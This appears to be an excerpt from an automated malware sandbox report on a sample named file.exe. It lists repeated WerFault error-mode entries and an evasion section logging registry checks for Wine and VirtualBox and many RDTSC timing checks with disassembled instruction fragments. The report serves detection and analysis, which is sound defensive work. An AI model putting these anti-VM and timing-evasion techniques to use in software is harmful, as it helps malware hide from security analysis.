Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 825C27 second address: 825C34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 825C34 second address: 825C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0A06 second address: 9A0A28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796F3554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F1A796F3546h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0A28 second address: 9A0A2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984E16 second address: 984E1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984E1A second address: 984E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1A796B9BEDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984E31 second address: 984E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984E35 second address: 984E39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99FA72 second address: 99FA7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99FA7B second address: 99FA9B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1A796B9BE6h 0x00000008 jmp 00007F1A796B9BF0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99FA9B second address: 99FA9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A02A6 second address: 9A02AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3174 second address: 9A317E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A317E second address: 825C27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796B9BEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xor dword ptr [esp], 5F0F924Dh 0x00000011 or dword ptr [ebp+1244BE64h], eax 0x00000017 push dword ptr [ebp+122D07F1h] 0x0000001d sub dword ptr [ebp+122D1BCDh], edi 0x00000023 call dword ptr [ebp+122D1BC7h] 0x00000029 pushad 0x0000002a jmp 00007F1A796B9BECh 0x0000002f xor eax, eax 0x00000031 mov dword ptr [ebp+122D246Eh], ebx 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b clc 0x0000003c mov dword ptr [ebp+122D3B1Dh], eax 0x00000042 mov dword ptr [ebp+122D28CCh], eax 0x00000048 mov esi, 0000003Ch 0x0000004d mov dword ptr [ebp+122D28CCh], ecx 0x00000053 jmp 00007F1A796B9BEAh 0x00000058 add esi, dword ptr [esp+24h] 0x0000005c jmp 00007F1A796B9BF0h 0x00000061 lodsw 0x00000063 jnl 00007F1A796B9BECh 0x00000069 add eax, dword ptr [esp+24h] 0x0000006d jns 00007F1A796B9BECh 0x00000073 mov ebx, dword ptr [esp+24h] 0x00000077 pushad 0x00000078 js 00007F1A796B9BE8h 0x0000007e pushad 0x0000007f popad 0x00000080 and edi, dword ptr [ebp+122D3AB9h] 0x00000086 popad 0x00000087 nop 0x00000088 push eax 0x00000089 push eax 0x0000008a push edx 0x0000008b pushad 0x0000008c popad 0x0000008d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3332 second address: 9A337E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov si, ax 0x00000009 push 00000000h 0x0000000b sub dword ptr [ebp+122D3613h], eax 0x00000011 call 00007F1A796F3549h 0x00000016 jl 00007F1A796F3552h 0x0000001c push eax 0x0000001d jmp 00007F1A796F354Ah 0x00000022 mov eax, dword ptr [esp+04h] 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F1A796F354Fh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A34BF second address: 9A3538 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796B9BEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jp 00007F1A796B9BE6h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F1A796B9BE8h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e mov edi, dword ptr [ebp+122D3845h] 0x00000034 sub dword ptr [ebp+122D314Fh], edx 0x0000003a call 00007F1A796B9BE9h 0x0000003f jbe 00007F1A796B9BEEh 0x00000045 push eax 0x00000046 jng 00007F1A796B9BE6h 0x0000004c pop eax 0x0000004d push eax 0x0000004e jmp 00007F1A796B9BEAh 0x00000053 mov eax, dword ptr [esp+04h] 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a jmp 00007F1A796B9BEAh 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3538 second address: 9A353D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A353D second address: 9A3563 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1A796B9BF8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3563 second address: 9A35A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push edi 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jnc 00007F1A796F3546h 0x00000016 popad 0x00000017 pop edi 0x00000018 pop eax 0x00000019 cmc 0x0000001a push 00000003h 0x0000001c mov ecx, dword ptr [ebp+122D247Ah] 0x00000022 mov ecx, dword ptr [ebp+122D3A4Dh] 0x00000028 push 00000000h 0x0000002a mov esi, dword ptr [ebp+122D39FDh] 0x00000030 push 00000003h 0x00000032 mov dword ptr [ebp+122D1BC2h], edi 0x00000038 push 8E65A300h 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A35A5 second address: 9A35AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A35AB second address: 9A35B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3613 second address: 9C3617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3617 second address: 9C361B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C361B second address: 9C362D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F1A796B9BE6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C362D second address: 9C3631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988320 second address: 98832F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jbe 00007F1A796B9BE6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988348 second address: 98834C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98834C second address: 988358 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C1961 second address: 9C1965 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C1C19 second address: 9C1C37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007F1A796B9BF1h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2030 second address: 9C204B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796F3557h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C233B second address: 9C2343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C25CA second address: 9C25EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796F3552h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F1A796F3546h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9974B3 second address: 9974B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2D3B second address: 9C2D41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2D41 second address: 9C2D45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2E8C second address: 9C2E93 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2E93 second address: 9C2EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2EA0 second address: 9C2EAF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1A796F3546h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2EAF second address: 9C2ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1A796B9BF5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2ECA second address: 9C2ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2ECF second address: 9C2ED4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2ED4 second address: 9C2EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C316B second address: 9C3176 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F1A796B9BE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3403 second address: 9C341E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F1A796F3551h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C341E second address: 9C3424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3424 second address: 9C346A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 jmp 00007F1A796F3555h 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007F1A796F354Bh 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007F1A796F3559h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C346A second address: 9C348A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1A796B9BF7h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6DDC second address: 9C6DE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6DE0 second address: 9C6DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F1A796B9BECh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6DEE second address: 9C6E05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1A796F354Fh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6E05 second address: 9C6E0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6E0B second address: 9C6E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C889B second address: 9C889F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CBBA8 second address: 9CBBC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1A796F3546h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F1A796F354Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CBBC1 second address: 9CBBDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796B9BF2h 0x00000007 js 00007F1A796B9BECh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 989E18 second address: 989E22 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1A796F354Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 989E22 second address: 989E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F1A796B9BF2h 0x0000000c jp 00007F1A796B9BECh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CEF21 second address: 9CEF34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F1A796F3546h 0x0000000d jg 00007F1A796F3546h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CEF34 second address: 9CEF38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 992518 second address: 99251D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99251D second address: 992524 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE4F6 second address: 9CE4FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE62C second address: 9CE630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CEC35 second address: 9CEC3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CED86 second address: 9CED8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D08C1 second address: 9D08CA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D08CA second address: 9D092A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1A796B9BF2h 0x00000009 popad 0x0000000a popad 0x0000000b xor dword ptr [esp], 19CC2802h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F1A796B9BE8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c jmp 00007F1A796B9BF4h 0x00000031 movzx esi, bx 0x00000034 push B1F5A172h 0x00000039 push eax 0x0000003a push edx 0x0000003b push ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D092A second address: 9D092F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D092F second address: 9D0934 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0AAF second address: 9D0AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0AB4 second address: 9D0AB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0D5E second address: 9D0D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0D63 second address: 9D0D68 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0E85 second address: 9D0E9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1A796F3553h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0FEE second address: 9D0FF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F1A796B9BE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0FF9 second address: 9D100D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jnl 00007F1A796F3546h 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D163A second address: 9D1648 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1648 second address: 9D164E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D164E second address: 9D1652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D18EB second address: 9D18EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D199E second address: 9D19B0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1A796B9BE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
